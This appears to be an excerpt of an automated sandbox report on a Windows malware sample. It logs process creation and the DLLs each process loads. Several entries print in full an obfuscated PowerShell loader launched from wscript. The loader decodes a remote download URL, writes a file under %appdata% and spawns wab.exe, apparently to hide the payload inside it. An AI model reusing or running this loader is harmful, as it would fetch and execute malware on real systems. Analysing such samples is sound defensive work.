Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCing
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuldb$FaysgPTot,lrPrepse HepavVerdeaUdstrsSnrencBrudeuBallalconseaMilitrAfnaz)Foreb ');Kolesterol (Lnkampene 'Sving$ironwg InvelMe,leos,minbAm,era ,utrlbille:Mi,stRwrigluAnt oftos afAffete,lammrFrasesprotokhypere,ontrrInte.= Read$ OverSMaterkHul,oaRetssdIncepeVo.acvBesk,o .analenergd EnlaeTubulrK nnen S,ogeAnglo.s.lgssNeocopOpa tloprekiTheoptCalli( Syst$ UpheMAttacaCaddilBabelaBorttxKr dsaInfertPrakteT.kpr)isog, ');$Skadevolderne=$Ruffersker[0];Kolesterol (Lnkampene ',arte$SaloogBerunl Sorto,pisubtempeaCaliflP egr: ForsB ExciaWheredmoluciOdzoonCingJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Omrystninger.Dim && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntvdm64.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb: source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp
